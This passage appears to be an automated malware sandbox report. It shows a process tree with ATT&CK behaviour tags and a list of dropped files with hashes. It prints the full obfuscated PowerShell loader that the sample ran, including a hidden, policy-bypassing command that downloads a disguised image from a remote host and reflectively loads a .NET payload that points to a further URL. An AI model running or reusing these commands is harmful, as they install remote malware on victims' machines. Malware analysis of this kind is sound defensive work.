㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂ZwB0⥶ ⼻ ㎮ ㋺ ⑂Gg⥶ ⼻ ㎮ ㋺ ⑂KQ⥶ ⼻ ㎮ ㋺ ⑂7⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂YwBv⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂bQBh⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂BC⥶ ⼻ ㎮ ㋺ ⑂Hk⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂9⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂WwBT⥶ ⼻ ㎮ ㋺ ⑂Hk⥶ ⼻ ㎮ ㋺ ⑂cwB0⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂bQ⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂EM⥶ ⼻ ㎮ ㋺ ⑂bwBu⥶ ⼻ ㎮ ㋺ ⑂HY⥶ ⼻ ㎮ ㋺ ⑂ZQBy⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂XQ⥶ ⼻ ㎮ ㋺ ⑂6⥶ ⼻ ㎮ ㋺ ⑂Do⥶ ⼻ ㎮ ㋺ ⑂RgBy⥶ ⼻ ㎮ ㋺ ⑂G8⥶ ⼻ ㎮ ㋺ ⑂bQBC⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂cwBl⥶ ⼻ ㎮ ㋺ ⑂DY⥶ ⼻ ㎮ ㋺ ⑂N⥶ ⼻ ㎮ ㋺ ⑂BT⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂cgBp⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Zw⥶ ⼻ ㎮ ㋺ ⑂o⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂YgBh⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂ZQ⥶ ⼻ ㎮ ㋺ ⑂2⥶ ⼻ ㎮ ㋺ ⑂DQ⥶ ⼻ ㎮ ㋺ ⑂QwBv⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂bQBh⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂p⥶ ⼻ ㎮ ㋺ ⑂Ds⥶ ⼻ ㎮ ㋺ ⑂J⥶ ⼻ ㎮ ㋺ ⑂Bs⥶ ⼻ ㎮ ㋺ ⑂G8⥶ ⼻ ㎮ ㋺ ⑂YQBk⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂BB⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂cwBl⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂YgBs⥶ ⼻ ㎮ ㋺ ⑂Hk⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂9⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂WwBT⥶ ⼻ ㎮ ㋺ ⑂Hk⥶ ⼻ ㎮ ㋺ ⑂cwB0⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂bQ⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂FI⥶ ⼻ ㎮ ㋺ ⑂ZQBm⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂ZQBj⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂aQBv⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂LgBB⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂cwBl⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂YgBs⥶ ⼻ ㎮ ㋺ ⑂Hk⥶ ⼻ ㎮ ㋺ ⑂XQ⥶ ⼻ ㎮ ㋺ ⑂6⥶ ⼻ ㎮ ㋺ ⑂Do⥶ ⼻ ㎮ ㋺ ⑂T⥶ ⼻ ㎮ ㋺ ⑂Bv⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂o⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂YwBv⥶ ⼻ ㎮ ㋺ ⑂G0⥶ ⼻ ㎮ ㋺ ⑂bQBh⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂BC⥶ ⼻ ㎮ ㋺ ⑂Hk⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bl⥶ ⼻ ㎮ ㋺ ⑂HM⥶ ⼻ ㎮ ㋺ ⑂KQ⥶ ⼻ ㎮ ㋺ ⑂7⥶ ⼻ ㎮ ㋺ ⑂CQ⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂B5⥶ ⼻ ㎮ ㋺ ⑂H⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂ZQ⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂D0⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂bwBh⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂ZQBk⥶ ⼻ ㎮ ㋺ ⑂EE⥶ ⼻ ㎮ ㋺ ⑂cwBz⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂bQBi⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂eQ⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂Ec⥶ ⼻ ㎮ ㋺ ⑂ZQB0⥶ ⼻ ㎮ ㋺ ⑂FQ⥶ ⼻ ㎮ ㋺ ⑂eQBw⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂K⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂n⥶ ⼻ ㎮ ㋺ ⑂GQ⥶ ⼻ ㎮ ㋺ ⑂bgBs⥶ ⼻ ㎮ ㋺ ⑂Gk⥶ ⼻ ㎮ ㋺ ⑂Yg⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂Ek⥶ ⼻ ㎮ ㋺ ⑂Tw⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂Eg⥶ ⼻ ㎮ ㋺ ⑂bwBt⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂Jw⥶ ⼻ ㎮ ㋺ ⑂p⥶ ⼻ ㎮ ㋺ ⑂Ds⥶ ⼻ ㎮ ㋺ ⑂J⥶ ⼻ ㎮ ㋺ ⑂Bt⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bo⥶ ⼻ ㎮ ㋺ ⑂G8⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂D0⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂eQBw⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂LgBH⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂BN⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bo⥶ ⼻ ㎮ ㋺ ⑂G8⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂o⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂VgBB⥶ ⼻ ㎮ ㋺ ⑂Ek⥶ ⼻ ㎮ ㋺ ⑂Jw⥶ ⼻ ㎮ ㋺ ⑂p⥶ ⼻ ㎮ ㋺ ⑂C4⥶ ⼻ ㎮ ㋺ ⑂SQBu⥶ ⼻ ㎮ ㋺ ⑂HY⥶ ⼻ ㎮ ㋺ ⑂bwBr⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂K⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂k⥶ ⼻ ㎮ ㋺ ⑂G4⥶ ⼻ ㎮ ㋺ ⑂dQBs⥶ ⼻ ㎮ ㋺ ⑂Gw⥶ ⼻ ㎮ ㋺ ⑂L⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂g⥶ ⼻ ㎮ ㋺ ⑂Fs⥶ ⼻ ㎮ ㋺ ⑂bwBi⥶ ⼻ ㎮ ㋺ ⑂Go⥶ ⼻ ㎮ ㋺ ⑂ZQBj⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂WwBd⥶ ⼻ ㎮ ㋺ ⑂F0⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂o⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂B4⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂LgBB⥶ ⼻ ㎮ ㋺ ⑂FM⥶ ⼻ ㎮ ㋺ ⑂TQBD⥶ ⼻ ㎮ ㋺ ⑂C8⥶ ⼻ ㎮ ㋺ ⑂NQ⥶ ⼻ ㎮ ㋺ ⑂0⥶ ⼻ ㎮ ㋺ ⑂DE⥶ ⼻ ㎮ ㋺ ⑂Lw⥶ ⼻ ㎮ ㋺ ⑂y⥶ ⼻ ㎮ ㋺ ⑂DU⥶ ⼻ ㎮ ㋺ ⑂Mg⥶ ⼻ ㎮ ㋺ ⑂u⥶ ⼻ ㎮ ㋺ ⑂DM⥶ ⼻ ㎮ ㋺ ⑂MQ⥶ ⼻ ㎮ ㋺ ⑂x⥶ ⼻ ㎮ ㋺ ⑂C4⥶ ⼻ ㎮ ㋺ ⑂NQ⥶ ⼻ ㎮ ㋺ ⑂3⥶ ⼻ ㎮ ㋺ ⑂DE⥶ ⼻ ㎮ ㋺ ⑂Lg⥶ ⼻ ㎮ ㋺ ⑂3⥶ ⼻ ㎮ ㋺ ⑂D⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂MQ⥶ ⼻ ㎮ ㋺ ⑂v⥶ ⼻ ㎮ ㋺ ⑂C8⥶ ⼻ ㎮ ㋺ ⑂OgBw⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂d⥶ ⼻ ㎮ ㋺ ⑂Bo⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂s⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂JwBk⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂cwBh⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂aQB2⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂Bv⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂s⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂JwBk⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂cwBh⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂aQB2⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂Bv⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂I⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂s⥶ ⼻ ㎮ ㋺ ⑂C⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂JwBk⥶ ⼻ ㎮ ㋺ ⑂GU⥶ ⼻ ㎮ ㋺ ⑂cwBh⥶ ⼻ ㎮ ㋺ ⑂HQ⥶ ⼻ ㎮ ㋺ ⑂aQB2⥶ ⼻ ㎮ ㋺ ⑂GE⥶ ⼻ ㎮ ㋺ ⑂Z⥶ ⼻ ㎮ ㋺ ⑂Bv⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂L⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂n⥶ ⼻ ㎮ ㋺ ⑂FI⥶ ⼻ ㎮ ㋺ ⑂ZQBn⥶ ⼻ ㎮ ㋺ ⑂EE⥶ ⼻ ㎮ ㋺ ⑂cwBt⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂L⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂n⥶ ⼻ ㎮ ㋺ ⑂Cc⥶ ⼻ ㎮ ㋺ ⑂KQ⥶ ⼻ ㎮ ㋺ ⑂p⥶ ⼻ ㎮ ㋺ ⑂⥶ ⼻ ㎮ ㋺ ⑂==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⥶ ⼻ ㎮ ㋺ ⑂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3048
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ASMC/541/252.311.571.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2780

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
            Filesize

            19KB

            MD5

            f87703948653e0dc65cfd0374ae77f14

            SHA1

            492bd174d74764156a2fff95884ddf23304691da

            SHA256

            3fc4722313cc6a806de07ba123c1b78cd067d82508f933064be0b906d48e56c8

            SHA512

            bb15abbce4743f3d7f3a47ebe756ad6886ff3a7ee976e70feb8764e01fa8528b64d3673e0c4b3416053ac480fb771de8affc163d7b0b05dc290449e20fa4f6fe

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            03ed730f1185836fa28765b29f94e569

            SHA1

            2f91b34261d634c096c9bf4a3af2dbac0d052960

            SHA256

            9bd408e78acc33a12648f847d040998ec98c8e4017174b0cdd4379ed7d11f576

            SHA512

            72d990337c3b207beff9bde94a7001b4ef9f75e0d240c943ec584e8634883ecc5bacb60943335b09eca079bf45e844da1c98845d10d3ed0f950123ddd571a815

            Download Submit

          • C:\Users\Admin\AppData\Roaming\goodpicturewithgoodbutterswe.vBS
            Filesize

            178KB

            MD5

            47884612318c771b324b93d9ce36c534

            SHA1

            3802e1e23d944d5b8c49039d97d1131503300040

            SHA256

            7288e52716c9c88e2489310f47266865831b0880601cc029843a13536e7cb571

            SHA512

            82889ca4282bae018ccc880a9c265baae1032181371a0388a8210ce57a9eeb608d443bbbc8e20dc10ecbf623516f21dc2d32b5f1f04cb21223f9584c25ee89e9

            Download Submit

          • memory/808-0-0x000000002F801000-0x000000002F802000-memory.dmp

            Filesize

            4KB

            Download

          • memory/808-2-0x000000007117D000-0x0000000071188000-memory.dmp

            Filesize

            44KB

            Download

          • memory/808-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download

          • memory/808-23-0x000000007117D000-0x0000000071188000-memory.dmp

            Filesize

            44KB

            Download

          • memory/808-41-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download